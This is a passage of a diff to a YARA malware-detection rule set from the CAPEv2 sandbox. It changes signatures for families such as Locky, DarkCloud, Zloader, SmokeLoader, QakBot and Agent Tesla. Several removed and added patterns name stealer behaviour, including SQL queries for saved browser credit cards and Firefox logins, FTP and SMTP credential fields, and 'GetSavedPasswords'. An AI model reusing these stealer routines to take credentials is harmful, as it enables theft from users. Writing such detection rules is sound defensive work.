+		$major_ver = {0F B6 05 ?? ?? ?? ?? 6A ?? 6A 72 FF 75 0C 6A 70 50 FF 35 ?? ?? ?? ?? 8D 45 80 FF 35 ?? ?? ?? ?? 6A 63 FF 75 08 6A 67 50 FF 75 10 FF 15 ?? ?? ?? ?? 83 C4 38 8B E5 5D C3}
+		$stage_2_request_binary = "id="
+		$stage_2_request_img = ".png"
 
 	condition:
-		2 of them
+		any of ( $crypt* , $download* , $major_ver ) and all of ( $stage_2_request_* )
 }
-rule CAPE_Locky : FILE
+rule CAPE_Seduploader : FILE
 {
 	meta:
-		description = "Locky Payload"
+		description = "Seduploader decrypt function"
 		author = "kevoreilly"
-		id = "664d0365-af49-5222-a4ed-9260332f6940"
+		id = "a7152d8c-a197-5784-8a6d-453d41585df1"
 		date = "2019-10-30"
 		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Locky.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "9786c54a2644d9581fefe64be11b26e22806398e54e961fa4f19d26eae039cd7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Seduploader.yar#L1-L11"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "d70c886699169d4dafc5b063c93682a34af5667df6d293b52256ddc19ab9c516"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Locky Payload"
+		cape_type = "Seduploader Payload"
 
 	strings:
-		$string1 = "wallet.dat" wide
-		$string2 = "Locky_recover" wide
-		$string3 = "opt321" wide
+		$decrypt1 = {8D 0C 30 C7 45 FC 0A 00 00 00 33 D2 F7 75 FC 8A 82 ?? ?? ?? ?? 32 04 0F 88 01 8B 45 0C 40 89 45 0C 3B C3 7C DB}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and any of ( $decrypt* )
 }
-rule CAPE_Sedreco : FILE
+rule CAPE_Amadey : FILE
 {
 	meta:
-		description = "Sedreco encrypt function entry"
-		author = "kevoreilly"
-		id = "5b9ee4af-50a4-597c-8fa5-f2094c312d23"
-		date = "2019-10-30"
-		modified = "2022-06-09"
+		description = "Amadey Payload"
+		author = "kevoreilly, YungBinary"
+		id = "81d251a2-84c3-524c-8ea5-c92ca8764777"
+		date = "2021-02-18"
+		modified = "2025-08-15"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Sedreco.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "f735549606917f59a19157e604e54766e4456bc5d46e94cae3e0a3c18b52a7ca"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Amadey.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "988258716d5296c1323303e8fe4efd7f4642c87bfdbe970fe9a3bb3f410f70a4"
+		logic_hash = "5a7405a174b63826500f3b04c6f10bc9b40d5b49e85377bef027204e75dd1e9e"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Sedreco Payload"
+		cape_type = "Amadey Payload"
 
 	strings:
-		$encrypt1 = {55 8B EC 83 EC 2C 53 56 8B F2 57 8B 7D 08 B8 AB AA AA AA}
-		$encrypt2 = {55 8B EC 83 EC 20 8B 4D 10 B8 AB AA AA AA}
-		$encrypt64_1 = {48 89 4C 24 08 53 55 56 57 41 54 41 56 48 83 EC 18 45 8D 34 10 48 8B E9 B8 AB AA AA AA 4D 8B E1 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA}
+		$decode1 = {8B D1 B8 FF FF FF 7F D1 EA 2B C2 3B C8 76 07 BB FF FF FF 7F EB 08 8D 04 0A 3B D8 0F 42 D8}
+		$decode2 = {2B C8 8D 04 0A 33 D2 F7 F3 8B 5D ?? 8B CB 83 7B ?? 10}
+		$decode3 = {33 D2 8B 4D ?? 8B C7 F7 F6 8A 84 3B [4] 2A 44 0A 01 88 87 [4] 47 8B 45 ?? 8D 50 01}
+		$decode4 = {8A 04 02 88 04 0F 41 8B 7D ?? 8D 42 01 3B CB 7C}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt1 or $encrypt2 or $encrypt64_1
+		uint16( 0 ) == 0x5A4D and 2 of them
 }
-rule CAPE_Darkcloud : FILE
+rule CAPE_Codoso : FILE
 {
 	meta:
-		description = "No description has been set in the source file - CAPE"
-		author = "YungBinary"
-		id = "b3071be2-07b0-5242-a985-7bb23fef258c"
-		date = "2025-10-16"
-		modified = "2025-10-16"
-		reference = "https://x.com/YungBinary/status/1971585972912689643"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/DarkCloud.yar#L1-L39"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "e9a67fce4c1e4ffa7322c225522263aa4db94ae9f29113a81f5216fb4fa68b57"
+		description = "Codoso Payload"
+		author = "kevoreilly"
+		id = "4c3d8d77-ffa9-576d-bf88-7b5a1bfd1811"
+		date = "2019-10-30"
+		modified = "2019-10-30"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Codoso.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "32c9ed2ac29e8905266977a9ee573a252442d96fb9ec97d88642180deceec3f8"
 		score = 75
-		quality = 68
+		quality = 70
 		tags = "FILE"
-		cape_type = "DarkCloud Payload"
+		cape_type = "Codoso Payload"
 
 	strings:
-		$darkcloud1 = "===============DARKCLOUD===============" fullword wide
-		$creds1 = "@GateUrl" wide
-		$creds2 = "@StrFtpUser" wide
-		$creds3 = "@StrFtpPass" wide
-		$creds4 = "@StrFtpServer" wide
-		$creds5 = "@StrReceiver" wide
-		$creds6 = "@StrSmtpUser" wide
-		$creds7 = "@StrSmtpPass" wide
-		$sql1 = "SELECT item1 FROM metadata" wide
-		$sql2 = "SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards" wide
-		$sql3 = "SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins" wide
-		$sql4 = "SELECT address FROM ConversationRecipients" wide
-		$sql5 = "SELECT address FROM ConversationSenders" wide
-		$app1 = "Application : Pidgin" wide
-		$app2 = "Application: CoreFTP" wide
-		$app3 = "Application: WinSCP" wide
-		$app4 = "Application: Outlook" wide
-		$app5 = "Application : FileZilla" fullword wide
-		$fingerprint1 = "Computer Name: " fullword wide
-		$fingerprint2 = "OS FullName: " fullword wide
-		$fingerprint3 = "CPU: " fullword wide
-		$fingerprint4 = "SELECT * FROM Win32_Processor" fullword wide
-		$fingerprint5 = "SELECT * FROM Win32_OperatingSystem" fullword wide
+		$a1 = "WHO_A_R_E_YOU?"
+		$a2 = "DUDE_AM_I_SHARP-3.14159265358979"
+		$a3 = "USERMODECMD"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $darkcloud1 and 1 of ( $creds* ) or ( 3 of ( $creds* ) and 1 of ( $sql* ) ) or ( 2 of ( $sql* ) and 2 of ( $app* ) ) or ( 2 of ( $creds* ) and 2 of ( $fingerprint* ) ) or ( 2 of ( $app* ) and 2 of ( $fingerprint* ) and 1 of ( $sql* ) ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Cobaltstrikestager
+rule CAPE_Zloader_1 : FILE
 {
 	meta:
-		description = "Cobalt Strike Stager Payload"
-		author = "@dan__mayer <daniel@stairwell.com>"
-		id = "eedf71b1-9f27-5a6f-afe8-3ddae47f9a06"
-		date = "2023-01-18"
-		modified = "2023-01-18"
+		description = "Zloader Payload"
+		author = "kevoreilly, enzok"
+		id = "a4250532-ddfc-58c2-bbae-82cc201d0c5d"
+		date = "2020-04-04"
+		modified = "2025-12-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/CobaltStrikeStager.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6a55b0c3ab5f557dfb7a3f8bd616ede1bd9b93198590fc9d52aa19c1154388c5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Zloader.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "adbd0c7096a7373be82dd03df1aae61cb39e0a155c00bbb9c67abc01d48718aa"
+		logic_hash = "525670973b67aac048199529c97d6be00b0a8cca9bc90deb647366d92a5ea540"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "CobaltStrikeStager Payload"
+		tags = "FILE"
+		cape_type = "Zloader Payload"
 
 	strings:
-		$smb = { 68 00 B0 04 00 68 00 B0 04 00 6A 01 6A 06 6A 03 52 68 45 70 DF D4 }
-		$http_x86 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 }
-		$http_x64 = { 49 BE 77 69 6E 69 6E 65 74 00 41 56 49 89 E6 4C 89 F1 41 BA 4C 77 26 07 }
-		$dns = { 68 00 10 00 00 68 FF FF 07 00 6A 00 68 58 A4 53 E5 }
+		$rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)}
+		$decrypt_conf = {83 C4 04 84 C0 74 5? E8 [4] E8 [4] E8 [4] E8 [4] ?8 [4] ?8 [4] ?8}
+		$decrypt_conf_1 = {48 8d [5-11] e8 [4] 48 [3-4] 48 [3-4] 48 [6] E8}
+		$decrypt_conf_2 = {48 8d [5] 4? [5] e8 [4] 48 [3-4] 48 8d [5] E8 [4] 48}
+		$decrypt_key_1 = {66 89 C2 4? 8D 0D [3] 00 4? B? FC 03 00 00 E8 [4] 4? 83 C4 [1-2] C3}
+		$decrypt_key_2 = {48 8d 0d [3] 00 66 89 ?? 4? 89 F0 4? [2-5] E8 [4-5] 4? 83 C4}
+		$decrypt_key_3 = {48 8d 0d [3] 00 e8 [4] 66 89 [3] b? [4] e8 [4] 66 8b}
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $decrypt_conf* ) and ( 1 of ( $decrypt_key* ) or $rc4_init )
 }
-rule CAPE_Koiloader
+rule CAPE_Zloader2024 : FILE
 {
 	meta:
-		description = "KoiLoader"
-		author = "YungBinary"
-		id = "258e8857-7ea6-5098-9949-06d9d83853d4"
-		date = "2024-10-25"
-		modified = "2024-10-25"
+		description = "Zloader Payload"
+		author = "enzok"
+		id = "f99d0994-d4a4-577b-916d-7eaa98e7c331"
+		date = "2020-04-04"
+		modified = "2025-12-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/KoiLoader.yar#L1-L35"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "b462e3235c7578450b2b56a8aff875a3d99d22f6970a01db3ba98f7ecb6b01a0"
-		logic_hash = "264a536632f8f11c904b00c9d2e505b3263c733ad8fbc2ef19c25a5ad58cef90"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Zloader.yar#L20-L34"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "49405370a33abbf131c5d550cebe00780cc3fd3cbe888220686582ae88f16af7"
+		logic_hash = "27d883f6d6cab07e602f97a0a032a152386693f79dabf1bb87b0a8a053a38b03"
 		score = 75
 		quality = 70
-		tags = ""
-		cape_type = "KoiLoader Payload"
+		tags = "FILE"
+		cape_type = "Zloader Payload"
 
 	strings:
-		$chunk_1 = {
-            68 27 11 68 05
-            8B 45 ??
-            50
-            E8 ?? ?? ?? ??
-            83 C4 08
-            89 45 ??
-            68 15 B1 B3 09
-            8B 4D ??
-            51
-            E8 ?? ?? ?? ??
-            83 C4 08
-            89 45 ??
-            68 B5 96 AA 0D
-            8B 55 ??
-            52
-            E8 ?? ?? ?? ??
-            83 C4 08
-            89 45 ??
-            6A 00
-            FF 15 ?? ?? ?? ??
-        }
+		$conf_1 = {48 01 ?? 48 8D 15 [4] 41 B8 ?? 04 00 00 E8 [4] [0-5] C7 [1-2] 00 00 00 00}
+		$confkey_1 = {48 8D 15 [4] 48 89 ?? 49 89 ?? E8 [4] [0-5] C7 [1-2] 00 00 00 00}
+		$confkey_2 = {48 01 ?? 48 8D 15 [4] 41 B8 10 00 00 00 E8 [4] [0-5] C7 [1-2] 00 00 00 00 (48 8B|8B)}
+		$confkey_3 = {48 01 ?? 48 8D 15 [4] 41 B8 10 00 00 00 E8 [4] [0-5] C7 [1-2] 00 00 00 00 48 83 C4}
 
 	condition:
-		$chunk_1
+		uint16( 0 ) == 0x5A4D and $conf_1 and 2 of ( $confkey_* )
 }
-rule CAPE_Obfuscar : FILE
+rule CAPE_Zloader2025 : FILE
 {
 	meta:
-		description = "Obfuscar xor routime"
-		author = "kevoreilly"
-		id = "81eeb62f-578f-5c75-bc96-091d5727a20a"
-		date = "2025-03-07"
-		modified = "2025-03-07"
+		description = "Zloader Payload"
+		author = "enzok"
+		id = "dd6ee439-9599-564c-8841-94bd89ae2db0"
+		date = "2020-04-04"
+		modified = "2025-12-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Obfuscar.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "54581e83e5fa13fae4bda74016b3fa1d18c92e2659f493ebe54d70fd5f77bba5"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Zloader.yar#L36-L49"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		hash = "86ffd411b42d8d06bdb294f48e79393adeea586c56c5c75c1a68ce6315932881"
+		logic_hash = "cc9c39f0b5e7e8c8853982d9c896bbaac5a36bb0f501c8901d8854f2d5e1a19c"
 		score = 75
 		quality = 70
 		tags = "FILE"
+		cape_type = "Zloader Payload"
 
 	strings:
-		$decode = {06 91 06 61 20 [4] 61 D2 9C 06 17 58 0A 06 7E [4] 8E 69 FE 04 2D ?? 2A}
+		$conf = {4? 01 ?? [4] E8 [4] 4? 8D 15 [4] 4? 89 ?? 4? 89 ?? E8 [4] C7 46 30 00 00 00 00 8B 7E 34}
+		$confkey_1 = {4? 01 ?? [2] E8 [4] 4? 8D 15 [4] 4? 89 ?? 4? 89 ?? E8 [4] C7 46 34 00 00 00 00 8B 46 38}
+		$confkey_2 = {4? 01 ?? [2] E8 [4] 4? 8D 15 [4] 4? 89 ?? 4? 89 ?? E8 [4] C7 46 38 00 00 00 00 48 83 C4 28}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and $conf and all of ( $confkey_* )
 }
-rule CAPE_Ramnit : FILE
+rule CAPE_Smokeloader
 {
 	meta:
-		description = "Ramnit Payload"
+		description = "SmokeLoader Payload"
 		author = "kevoreilly"
-		id = "6df92055-05f6-5985-9268-b9c85e143567"
+		id = "33c11a73-30d5-507b-af12-14708fa96640"
 		date = "2019-10-30"
-		modified = "2019-10-30"
+		modified = "2025-11-19"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Ramnit.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6f661f47bdf8377b0fb96f190fcb964c0ed2b43ce7ae7880f9dfce9e43837efd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/SmokeLoader.yar#L1-L16"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "8e2f95af9b25ccfd8ad7b56f75a37bb085bde1b2feda2e6502568e86c928ed68"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Ramnit Payload"
+		tags = ""
+		cape_type = "SmokeLoader Payload"
 
 	strings:
-		$DGA = {33 D2 B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 F7 E2 8B D1 8B C8 B8 14 0B 00 00 F7 E2 2B C8 33 D2 8B C1 8B}
-		$xor_loop = {83 7D 0C 00 74 27 83 7D 14 00 74 21 8B 4D 0C 8B 7D 08 8B 75 10 BA 00 00 00 00 0B D2 75 04 8B 55 14 4A 8A 1C 32 32 1F 88 1F 47 4A E2 ED}
-		$id_string = "{%08X-%04X-%04X-%04X-%08X%04X}"
+		$rc4_decrypt64_1 = {41 8D 41 01 44 0F B6 C8 42 0F B6 [2] 41 8D 04 12 44 0F B6 D0 42 8A [2] 42 88 [2] 42 88 [2] 42 0F B6 [2] 03 CA 0F B6 C1 8A [2] 30 0F 48 FF C7 49 FF CB 75}
+		$rc4_decrypt64_2 = {03 C8 8B C1 89 44 [2] 0F B6 8C [2] 01 00 00 33 D2 8B 04 24 F7 F1 8B C2 8B C0 48 8B 8C [2] 01 00 00 0F B6 04 01 8B 4C [2] 03 C8 8B C1 25 FF 00 00 00}
+		$rc4_decrypt64_3 = {8B 04 ?? FF C0 25 FF 00 00 00 89 04 ?? 8B 04 ?? 0F B6 44 [2] 8B 4C [2] 03 C8 8B C1 25 FF 00 00 00}
+		$rc4_decrypt32 = {47 B9 FF 00 00 00 23 F9 8A 54 [2] 0F B6 C2 03 F0 23 F1 8A 44 [2] 88 44 [2] 88 54 [2] 0F B6 4C [2] 0F B6 C2 03 C8 81 E1 FF 00 00 00 8A 44 [2] 30 04 2B 43 3B 9C 24 [4] 72 C0}
+		$fetch_c2_64 = {74 ?? B? E8 03 00 00 B9 58 02 00 00 FF [5] 48 (FF C?|83 EF 01) 75 (F0|EF)}
+		$fetch_c2_32 = {8B 96 [2] (00|01) 00 8B CE 5E 8B 14 95 [4] E9}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $* )
+		2 of them
 }
-rule CAPE_Gandcrab : FILE
+rule CAPE_Xenorat
 {
 	meta:
-		description = "Gandcrab Payload"
-		author = "kevoreilly"
-		id = "0082e8c9-952e-508c-a438-4e17b8031864"
-		date = "2019-10-30"
-		modified = "2022-06-09"
+		description = "No description has been set in the source file - CAPE"
+		author = "jeFF0Falltrades"
+		id = "9708158d-06fc-5991-a084-df2bfe1d5c96"
+		date = "2024-10-09"
+		modified = "2024-10-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Gandcrab.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "354ed566dbafbe8e9531bb771d9846952eb8c0e70ee94c26d09368159ce4142c"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/XenoRAT.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "26f520fb69a52d05786fac0e9e38f5db9601da0a3e7768e00975a9684f3560ef"
 		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_type = "Gandcrab Payload"
+		quality = 66
+		tags = ""
+		cape_type = "XenoRAT payload"
 
 	strings:
-		$string1 = "GDCB-DECRYPT.txt" wide
-		$string2 = "GandCrabGandCrabnomoreransom.coinomoreransom.bit"
-		$string3 = "action=result&e_files=%d&e_size=%I64u&e_time=%d&" wide
-		$string4 = "KRAB-DECRYPT.txt" wide
+		$str_xeno_rat_1 = "xeno rat" wide ascii nocase
+		$str_xeno_rat_2 = "xeno_rat" wide ascii nocase
+		$str_xeno_update_mgr = "XenoUpdateManager" wide ascii
+		$str_nothingset = "nothingset" wide ascii
+		$byte_enc_dec_pre = { 1f 10 8d [4] (0a | 0b) }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $string* )
+		4 of them and #patt_config >= 5
 }
-rule CAPE_Ursnifv3_1 : FILE
+rule CAPE_Agent_Tesla
 {
 	meta:
-		description = "UrsnifV3 Payload"
-		author = "kevoreilly"
-		id = "9dd32f80-b535-52a3-91e1-4db005362fd4"
-		date = "2022-05-31"
-		modified = "2023-03-23"
+		description = "Detecting HTML strings used by Agent Tesla malware"
+		author = "Stormshield"
+		id = "5383994b-357d-539b-89b1-53be238f759d"
+		date = "2019-10-30"
+		modified = "2026-01-14"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/UrsnifV3.yar#L1-L18"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "501cd52388aba16f9d33b4555f310e1ad58326916b15358a485c701acb87abd8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AgentTesla.yar#L1-L17"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "3945754129dcc58e0abfd7485f5ff0c0afdd1078ae2cf164ca8f59a6f79db1be"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "UrsnifV3 Payload"
-		packed = "75827be0c600f93d0d23d4b8239f56eb8c7dc4ab6064ad0b79e6695157816988"
-		packed = "5d6f1484f6571282790d64821429eeeadee71ba6b6d566088f58370634d2c579"
+		tags = ""
+		version = "1.0"
 
 	strings:
-		$crypto32_1 = {8B C3 83 EB 01 85 C0 75 0D 0F B6 16 83 C6 01 89 74 24 14 8D 58 07 8B C2 C1 E8 07 83 E0 01 03 D2 85 C0 0F 84 AB 01 00 00 8B C3 83 EB 01 85 C0 89 5C 24 20 75 13 0F B6 16 83 C6 01 BB 07 00 00 00}
-		$crypto32_2 = {8B 45 ?? 0F B6 3? FF 45 [2-4] 8B C? 23 C? 40 40 D1 E? 7?}
-		$crypto32_3 = {F6 46 03 02 75 5? 8B 46 10 40 50 E8 [10-12] 74 ?? F6 46 03 01 74}
-		$crypto32_4 = {C7 44 24 10 01 00 00 00 8B 4? 10 [12] 8B [2] 89 01 8B 44 24 10 5F 5E 5B 8B E5 5D C2 0C 00}
-		$cpuid = {8B C4 FF 18 8B F0 33 C0 0F A2 66 8C D8 66 8E D0 8B E5 8B C6 5E 5B 5D C3}
-		$cape_string = "cape_options"
+		$html_username = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii
+		$html_pc_name = "<br>PC&nbsp;Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: " wide ascii
+		$html_os_name = "<br>OS&nbsp;Full&nbsp;Name&nbsp;&nbsp;: " wide ascii
+		$html_os_platform = "<br>OS&nbsp;Platform&nbsp;&nbsp;&nbsp;: " wide ascii
+		$html_clipboard = "<br><span style=font-style:normal;text-decoration:none;text-transform:none;color:#FF0000;><strong>[clipboard]</strong></span>" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $crypto32_* ) and $cpuid and not $cape_string
+		3 of them
 }
-rule CAPE_Qakbot5_1 : FILE
+rule CAPE_Agenttesla : FILE
 {
 	meta:
-		description = "QakBot v5 Payload"
-		author = "kevoreilly, enzok"
-		id = "48866cdd-f60e-50b8-85f9-573710934b0b"
+		description = "AgentTesla Payload"
+		author = "kevoreilly"
+		id = "f7b930f1-cecb-5d80-809b-9503f282247a"
 		date = "2019-10-30"
-		modified = "2024-04-28"
+		modified = "2026-01-14"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/QakBot.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "59559e97962e40a15adb2237c4d01cfead03623aff1725616caeaa5a8d273a35"
-		logic_hash = "cc23a92f45619d44af824128b743c259dd9dfa7cb5106932f3425f3dfd1dccdf"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AgentTesla.yar#L19-L41"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "1bf9b26c4cf87e674ddffabe40aba5a45499c6a04d4ff3e43c3cda4cbcb4d188"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "QakBot Payload"
-		packed = "f4bb0089dcf3629b1570fda839ef2f06c29cbf846c5134755d22d419015c8bd2"
+		cape_type = "AgentTesla Payload"
 
 	strings:
-		$loop = {8B 75 ?? 48 8B 4C [2] FF 15 [4] 48 8B 4C [2] 48 8B 01 FF 50 ?? 8B DE 48 8B 4C [2] 48 85 C9 0F 85 [4] EB 4E}
-		$c2list = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 45 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8}
-		$campaign = {0F B7 1D [4] B? [2] 00 00 E8 [4] 8B D3 4? 89 44 24 ?? 4? 33 C9 4? 8D 0D [4] 4? 8B C0 4? 8B F8 E8}
+		$string1 = "smtp" wide
+		$string2 = "appdata" wide
+		$string3 = "76487-337-8429955-22614" wide
+		$string4 = "yyyy-MM-dd HH:mm:ss" wide
+		$string6 = "webpanel" wide
+		$string7 = "<br>UserName&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:" wide
+		$string8 = "<br>IP Address&nbsp;&nbsp;:" wide
+		$agt1 = "IELibrary.dll" ascii
+		$agt2 = "C:\\Users\\Admin\\Desktop\\IELibrary\\IELibrary\\obj\\Debug\\IELibrary.pdb" ascii
+		$agt3 = "GetSavedPasswords" ascii
+		$agt4 = "GetSavedCookies" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and ( all of ( $string* ) or 3 of ( $agt* ) )
 }
-rule CAPE_Qakbot4_1 : FILE
+rule CAPE_Agentteslav2 : FILE
 {
 	meta:
-		description = "QakBot v4 Payload"
-		author = "kevoreilly"
-		id = "d2c5316c-22cc-5b6d-b6a2-b1d23a06d16b"
+		description = "AgenetTesla Type 2 Keylogger payload"
+		author = "ditekshen"
+		id = "e60ecee4-0a97-56a1-b21e-47190f8cd1f8"
 		date = "2019-10-30"
-		modified = "2024-04-28"
+		modified = "2026-01-14"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/QakBot.yar#L17-L35"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "b2870e33abffbb3ff49b7891b0f5c538ab48ee63da5553929d4e37dec921344f"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AgentTesla.yar#L43-L67"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "b45296b3b94fa1ff32de48c94329a17402461fb6696e9390565c4dba9738ed78"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "QakBot Payload"
+		cape_type = "AgentTesla Payload"
 
 	strings:
